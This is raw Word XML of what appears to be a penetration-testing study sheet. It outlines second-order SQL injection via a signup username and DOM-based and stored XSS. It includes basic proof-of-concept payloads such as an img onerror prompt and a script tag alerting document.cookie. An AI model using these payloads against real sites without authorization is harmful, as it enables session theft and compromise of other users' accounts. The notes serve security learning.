                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="33337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85775" y="848482"/>
                            <a:ext cx="4848667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EDDF3" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="110"/>
                                </w:rPr>
                                <w:t>Later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on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use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same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user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name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above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passwd.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A70F8" id="Group 3877" o:spid="_x0000_s1135" style="width:518.25pt;height:96pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 6071" o:spid="_x0000_s1136" style="position:absolute;top:11144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6072" o:spid="_x0000_s1137" style="position:absolute;top:12001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304" o:spid="_x0000_s1138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" path="m23813,v3157,,6195,605,9112,1811c35843,3020,38418,4741,40651,6973v2232,2233,3953,4806,5161,7721c47021,17614,47625,20653,47625,23813v,3156,-604,6191,-1813,9109c44604,35837,42883,38413,40651,40649v-2233,2229,-4808,3950,-7726,5159c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40649,4742,38413,3021,35837,1813,32922,604,30004,,26969,,23813,,20653,604,17614,1813,14700,3021,11782,4742,9206,6975,6973,9207,4741,11783,3020,14700,1811,17617,605,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 305" o:spid="_x0000_s1139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" path="m47625,23813v,3156,-604,6191,-1813,9109c44604,35837,42883,38413,40650,40646v-2232,2232,-4808,3953,-7725,5162c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40646,4742,38413,3021,35837,1813,32919,604,30004,,26969,,23813,,20653,604,17614,1813,14694,3021,11776,4742,9203,6975,6973,9207,4741,11783,3020,14700,1811,17617,602,20655,,23813,v3157,,6195,602,9112,1811c35842,3020,38418,4741,40650,6973v2233,2230,3954,4803,5162,7721c47021,17614,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 306" o:spid="_x0000_s1140" style="position:absolute;left:4857;top:2769;width:2239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6205CAF9" w14:textId="01C74F74" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>Second</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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9"/>
                          </w:rPr>
                          <w:t>order</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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SQL</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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9"/>
                          </w:rPr>
                          <w:t>injection.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 307" o:spid="_x0000_s1141" style="position:absolute;left:3333;top:600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" path="m47625,23813v,3156,-604,6191,-1813,9109c44604,35840,42883,38413,40650,40649v-2232,2229,-4808,3950,-7725,5159c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40649,4742,38413,3021,35840,1813,32922,604,30004,,26969,,23813,,20653,604,17614,1813,14697,3021,11779,4742,9203,6975,6973,9207,4738,11783,3017,14700,1811,17617,602,20655,,23813,v3157,,6195,605,9112,1811c35842,3020,38418,4738,40650,6973v2233,2230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308" o:spid="_x0000_s1142" style="position:absolute;left:4857;top:5627;width:4510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1800E2D" w14:textId="67980FD0" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="112"/>
                          </w:rPr>
                          <w:t>Signup</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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2"/>
                          </w:rPr>
                          <w:t>using</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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2"/>
                          </w:rPr>
                          <w:t>a</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12"/>
                            <w:w w:val="112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12"/>
                          </w:rPr>
                          <w:t>SQL</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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2"/>
                          </w:rPr>
                          <w:t>payload</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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2"/>
                          </w:rPr>
                          <w:t>(</w:t>
                        </w:r>
                        <w:r w:rsidR="00303E9F">
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="112"/>
                          </w:rPr>
                          <w:t>username</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="112"/>
                          </w:rPr>
                          <w:t>)</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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2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2"/>
                          </w:rPr>
                          <w:t>a</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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2"/>
                          </w:rPr>
                          <w:t>passwd.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 309" o:spid="_x0000_s1143" style="position:absolute;left:3333;top:885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" path="m47625,23813v,3156,-604,6191,-1813,9109c44604,35837,42883,38413,40650,40646v-2232,2232,-4808,3953,-7725,5162c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40646,4742,38413,3021,35837,1813,32919,604,30004,,26969,,23813,,20653,604,17614,1813,14700,3021,11779,4742,9203,6975,6973,9207,4738,11783,3017,14700,1811,17617,602,20655,,23813,v3157,,6195,602,9112,1811c35842,3017,38418,4738,40650,6973v2233,2230,3954,4806,5162,7724c47021,17614,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 310" o:spid="_x0000_s1144" style="position:absolute;left:4857;top:8484;width:4848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65FEDDF3" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="110"/>
                          </w:rPr>
                          <w:t>Later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on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use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same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user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name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above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passwd.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B13FC8" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="32373F"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>4.Cros side scripting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE8BE1E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="32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631977C7" wp14:editId="6314F18C">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3878" name="Group 3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6171" name="Shape 6171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" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 6172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7AD22BEF" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="271"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>XXS 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC6203" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3583630C" wp14:editId="0C7B9F60">
                <wp:extent cx="285750" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3881" name="Group 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361950"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="36195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17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1" style="width:22.5pt;height:28.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="2857,3619">
                <v:shape id="Shape 313" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,605,32925,1814c35843,3017,38418,4735,40651,6970c42883,9203,44604,11779,45812,14697c47021,17611,47625,20653,47625,23813c47625,26966,47021,30001,45812,32919c44604,35833,42883,38410,40651,40649c38418,42875,35843,44596,32925,45805c30008,47014,26970,47619,23813,47625c20655,47619,17617,47014,14700,45805c11783,44596,9207,42875,6975,40649c4742,38410,3021,35833,1813,32919c604,30001,0,26966,0,23813c0,20653,604,17611,1813,14697c3021,11779,4742,9203,6975,6970c9207,4735,11783,3014,14700,1808c17617,605,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 314" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32919c44604,35833,42883,38410,40650,40649c38418,42875,35842,44596,32925,45805c30008,47014,26970,47619,23813,47625c20655,47619,17617,47014,14700,45805c11783,44596,9207,42875,6975,40649c4742,38410,3021,35833,1813,32919c604,30001,0,26969,0,23813c0,20653,604,17611,1813,14697c3021,11776,4742,9199,6975,6970c9207,4738,11783,3017,14700,1808c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1808c35842,3017,38418,4738,40650,6970c42883,9199,44604,11776,45812,14697c47021,17611,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOM based XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66790666" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="267"/>
        <w:ind w:right="-1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9DDB72" wp14:editId="2BF89FBF">
                <wp:extent cx="6581774" cy="856497"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3885" name="Group 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856497"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="856497"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6173" name="Shape 6173"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="837447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33375" y="3734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85775" y="0"/>
                            <a:ext cx="2468174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BED1E" w14:textId="4ED5C780" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>List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updated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8"/>
                                </w:rPr>
                                <w:t>entirely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locally.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333375" y="32309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485775" y="285756"/>
                            <a:ext cx="11097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D199D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569212" y="285756"/>
                            <a:ext cx="2962719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0B5D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img</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="32373F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src=x</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="32373F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onerror="prompt(1).&gt;"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333375" y="60884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485775" y="571506"/>
                            <a:ext cx="11097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34B56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569212" y="571506"/>
                            <a:ext cx="3850486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621D3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img</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="32373F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src=x</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="32373F"/>
                                  <w:spacing w:val="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onerror="'httos://tcm-sec.com'".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3464314" y="571506"/>
                            <a:ext cx="110971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E5FE5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DDB72" id="Group 3885" o:spid="_x0000_s1145" style="width:518.25pt;height:67.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,8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">
                <v:shape id="Shape 6173" o:spid="_x0000_s1146" style="position:absolute;top:8374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330" o:spid="_x0000_s1147" style="position:absolute;left:3333;top:37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" path="m47625,23813v,3153,-604,6188,-1813,9106c44604,35833,42883,38410,40650,40649v-2232,2226,-4808,3947,-7725,5156c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1820c11783,44596,9207,42875,6975,40649,4742,38410,3021,35833,1813,32919,604,30001,,26966,,23813,,20653,604,17611,1813,14697,3021,11779,4742,9203,6975,6970,9207,4735,11783,3014,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3014,38418,4735,40650,6970v2233,2233,3954,4809,5162,7727c47021,17611,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 331" o:spid="_x0000_s1148" style="position:absolute;left:4857;width:2468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6FCBED1E" w14:textId="4ED5C780" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>List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updated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8"/>
                          </w:rPr>
                          <w:t>entirely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locally.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 332" o:spid="_x0000_s1149" style="position:absolute;left:3333;top:323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" path="m47625,23813v,3156,-604,6188,-1813,9106c44604,35833,42883,38407,40650,40642v-2232,2233,-4808,3954,-7725,5163c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1820c11783,44596,9207,42875,6975,40642,4742,38407,3021,35833,1813,32919,604,30001,,26969,,23813,,20653,604,17611,1813,14697,3021,11779,4742,9203,6975,6970,9207,4738,11783,3017,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3017,38418,4738,40650,6970v2233,2233,3954,4809,5162,7727c47021,17611,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 3790" o:spid="_x0000_s1150" style="position:absolute;left:4857;top:2857;width:111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TD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QunTDwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2DAD199D" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>&lt;</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3792" o:spid="_x0000_s1151" style="position:absolute;left:5692;top:2857;width:2962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8v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jyRPL8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="29990B5D" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>img</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F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color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>src=x</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F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color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>onerror="prompt(1).&gt;"</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 334" o:spid="_x0000_s1152" style="position:absolute;left:3333;top:608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" path="m47625,23813v,3153,-604,6188,-1813,9106c44604,35833,42883,38410,40650,40649v-2232,2232,-4808,3953,-7725,5156c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1820c11783,44602,9207,42881,6975,40649,4742,38410,3021,35833,1813,32919,604,30001,,26966,,23813,,20653,604,17611,1813,14697,3021,11776,4742,9199,6975,6970,9207,4735,11783,3014,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3014,38418,4735,40650,6970v2233,2229,3954,4806,5162,7721c47021,17611,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 3798" o:spid="_x0000_s1153" style="position:absolute;left:4857;top:5715;width:111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jF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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="46F34B56" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>&lt;</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3800" o:spid="_x0000_s1154" style="position:absolute;left:5692;top:5715;width:3850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US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DgR1EsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0B3621D3" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>img</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F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color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>src=x</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>onerror="'httos://tcm-sec.com'".</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3799" o:spid="_x0000_s1155" style="position:absolute;left:34643;top:5715;width:110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N1e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gYDdXsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="732E5FE5" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="117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F753E4" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="702"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>XXS 0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5A2DB0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:lef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153B9F" wp14:editId="559D4FC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-276977</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="933450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="3916" name="Group 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933450"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="933450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17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3812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3812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16" style="width:22.5pt;height:73.5pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:7.5pt;mso-position-vertical-relative:text;margin-top:-21.8093pt;" coordsize="2857,9334">
                <v:shape id="Shape 337" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,605,32925,1814c35843,3017,38418,4735,40651,6970c42883,9199,44604,11776,45812,14691c47021,17608,47625,20650,47625,23813c47625,26966,47021,30001,45812,32922c44604,35840,42883,38410,40651,40649c38418,42881,35843,44602,32925,45811c30008,47014,26970,47619,23813,47625c20655,47619,17617,47014,14700,45811c11783,44602,9207,42881,6975,40649c4742,38410,3021,35840,1813,32922c604,30001,0,26966,0,23813c0,20650,604,17608,1813,14691c3021,11776,4742,9199,6975,6970c9207,4735,11783,3014,14700,1805c17617,598,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 338" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32919c44604,35833,42883,38410,40650,40649c38418,42875,35842,44596,32925,45805c30008,47014,26970,47619,23813,47625c20655,47619,17617,47014,14700,45805c11783,44596,9207,42875,6975,40649c4742,38410,3021,35833,1813,32919c604,30001,0,26969,0,23813c0,20653,604,17611,1813,14697c3021,11776,4742,9199,6975,6970c9207,4738,11783,3017,14700,1808c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1808c35842,3017,38418,4738,40650,6970c42883,9199,44604,11776,45812,14697c47021,17611,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 340" style="position:absolute;width:476;height:476;left:2381;top:6000;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32919c44604,35840,42883,38416,40650,40649c38418,42875,35842,44596,32925,45805c30008,47014,26970,47619,23813,47625c20655,47619,17617,47014,14700,45805c11783,44596,9207,42875,6975,40649c4742,38416,3021,35840,1813,32919c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14697c3021,11779,4742,9203,6975,6970c9207,4735,11783,3014,14700,1808c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1808c35842,3014,38418,4735,40650,6970c42883,9203,44604,11779,45812,14697c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 342" style="position:absolute;width:476;height:476;left:2381;top:8858;" coordsize="47625,47625" path="m47625,23813c47625,26966,47021,30001,45812,32919c44604,35833,42883,38410,40650,40649c38418,42881,35842,44602,32925,45811c30008,47014,26970,47619,23813,47625c20655,47619,17617,47014,14700,45811c11783,44602,9207,42881,6975,40649c4742,38410,3021,35833,1813,32919c604,30001,0,26966,0,23813c0,20653,604,17611,1813,14697c3021,11779,4742,9203,6975,6970c9207,4735,11783,3014,14700,1808c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1808c35842,3014,38418,4735,40650,6970c42883,9203,44604,11779,45812,14697c47021,17611,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373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32373F"/>
        </w:rPr>
        <w:t>Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2097AD4E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>The result must effect database and to all the users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0402E" w14:textId="49296F2E" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="52"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">Create 2 or more user accounts add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>&lt; script&gt;alert(</w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>document. Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>)&lt;/ script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> to one account and when we </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> another account we will see it getting reflected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370B236A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0F0A5971" wp14:editId="1B15F6DB">
                <wp:extent cx="6581774" cy="284997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284997"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="284997"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6215" name="Shape 6215"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="265947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33375" y="3734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85775" y="0"/>
                            <a:ext cx="1510355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6B303" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="120"/>
                                </w:rPr>
                                <w:t>Basis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20"/>
                                </w:rPr>
                                <w:t>Stored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20"/>
                                </w:rPr>
                                <w:t>XXS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A5971" id="Group 3889" o:spid="_x0000_s1156" style="width:518.25pt;height:22.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,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">
                <v:shape id="Shape 6215" o:spid="_x0000_s1157" style="position:absolute;top:2659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347" o:spid="_x0000_s1158" style="position:absolute;left:3333;top:37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" path="m47625,23813v,3156,-604,6188,-1813,9106c44604,35833,42883,38410,40650,40649v-2232,2232,-4808,3953,-7725,5156c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1820c11783,44602,9207,42881,6975,40649,4742,38410,3021,35833,1813,32919,604,30001,,26969,,23813,,20650,604,17608,1813,14691,3021,11776,4742,9199,6975,6970,9207,4738,11783,3017,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3017,38418,4738,40650,6970v2233,2229,3954,4806,5162,7721c47021,17608,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 348" o:spid="_x0000_s1159" style="position:absolute;left:4857;width:1510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0E56B303" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="120"/>
                          </w:rPr>
                          <w:t>Basis</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="1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20"/>
                          </w:rPr>
                          <w:t>Stored</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="1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20"/>
                          </w:rPr>
                          <w:t>XXS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5A7957" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="286"/>
        <w:ind w:left="-5"/>
